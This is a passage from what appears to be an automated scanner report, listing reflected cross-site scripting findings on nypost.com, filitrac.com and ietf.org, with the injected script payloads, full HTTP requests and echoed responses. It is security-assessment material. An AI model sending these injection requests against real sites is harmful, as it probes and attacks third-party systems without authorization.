Set-Cookie: a=dT1DRUI4RTZCQzRENTBBQjI1; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehiclebc8e1"><script>alert(1)</script>f52bfa6af88/commercial_truck/" />
...[SNIP]...

1.158. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b4d1"><script>alert(1)</script>c1eb8da859f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle5b4d1"><script>alert(1)</script>c1eb8da859f/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:07 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=c4d87cb29211116f1d84d383dec91eab; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ab8f61ec5acb038133e79b13dcca0726; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FOThEN0U2QTRENTBBQjI3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle5b4d1"><script>alert(1)</script>c1eb8da859f/motorcycle/" />
...[SNIP]...

1.159. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fb0"-alert(1)-"4be135d4517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle91fb0"-alert(1)-"4be135d4517/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=46e1bc3aaff423d92d301a3013941096; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=635d3f0a77da507bccb54c98bf67f230; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DODI5QTlERTRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle91fb0"-alert(1)-"4be135d4517/motorcycle/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.160. http://www.filitrac.com/Click.aspx [FiliAff parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.filitrac.com
Path:   /Click.aspx

Issue detail

The value of the FiliAff request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b57e'-alert(1)-'b4b4ed5a7c was submitted in the FiliAff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c&sid=exit HTTP/1.1
Host: www.filitrac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Feb 2011 05:32:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el2q5mrsx1bsw521aiud0555; path=/; HttpOnly
Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d267492b57e'-alert(1)-'b4b4ed5a7c%26sid%3dexit&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:38 GMT; path=/
Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MTdytPV2esxOkISKH2tSSAE73lDiWMpwmuRquz9NJAxV74Urlaf49qoA%3d%3d; expires=Thu, 10-Mar-2011 05:32:38 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1189
p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><title>
   Click
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE"
...[SNIP]...
<script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c'</script>
...[SNIP]...

1.161. http://www.filitrac.com/Click.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.filitrac.com
Path:   /Click.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deece'%3balert(1)//9bd7996a908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as deece';alert(1)//9bd7996a908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=26749&sid=exit&deece'%3balert(1)//9bd7996a908=1 HTTP/1.1
Host: www.filitrac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Feb 2011 05:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3n0yk545rpdkwi45kxb554u1; path=/; HttpOnly
Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d26749%26sid%3dexit%26deece'%3balert(1)%2f%2f9bd7996a908%3d1&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:45 GMT; path=/
Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MT%2fFqwoAxqMoCESPGASQ%2fXr9ZUw11ln7nKhXOAXEuCM91B1GAwMVTGIw%3d%3d; expires=Thu, 10-Mar-2011 05:32:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1215
p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><title>
   Click
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE"
...[SNIP]...
<script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=26749&deece';alert(1)//9bd7996a908=1'</script>
...[SNIP]...

1.162. http://www.ietf.org/rfc/rfc2396.txt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ietf.org
Path:   /rfc/rfc2396.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9355a<script>alert(1)</script>1289f0bffc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt HTTP/1.1
Host: www.ietf.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 05:33:05 GMT
Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<p>You requested: http://www.ietf.org/rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt</p>
...[SNIP]...

1.163. http://www.ietf.org/rfc/rfc2396.txt [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ietf.org
Path:   /rfc/rfc2396.txt

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9415<script>alert(1)</script>c3f3413731f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f HTTP/1.1
Host: www.ietf.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 05:33:15 GMT
Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<p>You requested: http://www.ietf.org/rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f</p>
...[SNIP]...

1.164. http://www.nypost.com/Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd748"><script>alert(1)</script>56a717121ed was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt?redirect=/bd748"><script>alert(1)</script>56a717121ed HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 1156
Content-Type: text/html;charset=UTF-8
Expires: Tue, 08 Feb 2011 02:33:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:33:52 GMT
Connection: close

<div id="form_wrapper" class="form_wrapper">
   <div class="form_inner_lt">
       <div class="mini_form">
           <div class="mini_form_head"><h3>Login to your NYPOST.com account</h3></div>
           <form method=
...[SNIP]...
<input type="hidden" name="redirect" value="/bd748"><script>alert(1)</script>56a717121ed#comments" />
...[SNIP]...

1.165. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 861d6<script>alert(1)</script>39a1c29746b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig861d6<script>alert(1)</script>39a1c29746b/WebPortal/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig861d6<script>alert(1)</script>39a1c29746b/WebPortal/nypost/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.166. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a6cb<script>alert(1)</script>a2e646f15e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal9a6cb<script>alert(1)</script>a2e646f15e4/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal9a6cb<script>alert(1)</script>a2e646f15e4/nypost/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.167. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3192f<script>alert(1)</script>ce481558adf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost3192f<script>alert(1)</script>ce481558adf/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost3192f<script>alert(1)</script>ce481558adf/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.168. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59c0d<script>alert(1)</script>06928e5fd29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks59c0d<script>alert(1)</script>06928e5fd29/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks59c0d<script>alert(1)</script>06928e5fd29/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.169. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44dab<script>alert(1)</script>232703e53ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage44dab<script>alert(1)</script>232703e53ee/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage44dab<script>alert(1)</script>232703e53ee/columnists/columnists.css</p>
...[SNIP]...

1.170. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d512<script>alert(1)</script>4c56166ae8e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists6d512<script>alert(1)</script>4c56166ae8e/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists6d512<script>alert(1)</script>4c56166ae8e/columnists.css</p>
...[SNIP]...

1.171. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload a2474<script>alert(1)</script>71fb61d3344 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.cssa2474<script>alert(1)</script>71fb61d3344 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.cssa2474<script>alert(1)</script>71fb61d3344</p>
...[SNIP]...

1.172. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca49c<script>alert(1)</script>fb9e79d983d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigca49c<script>alert(1)</script>fb9e79d983d/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigca49c<script>alert(1)</script>fb9e79d983d/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.173. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cff06<script>alert(1)</script>dce59e57048 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

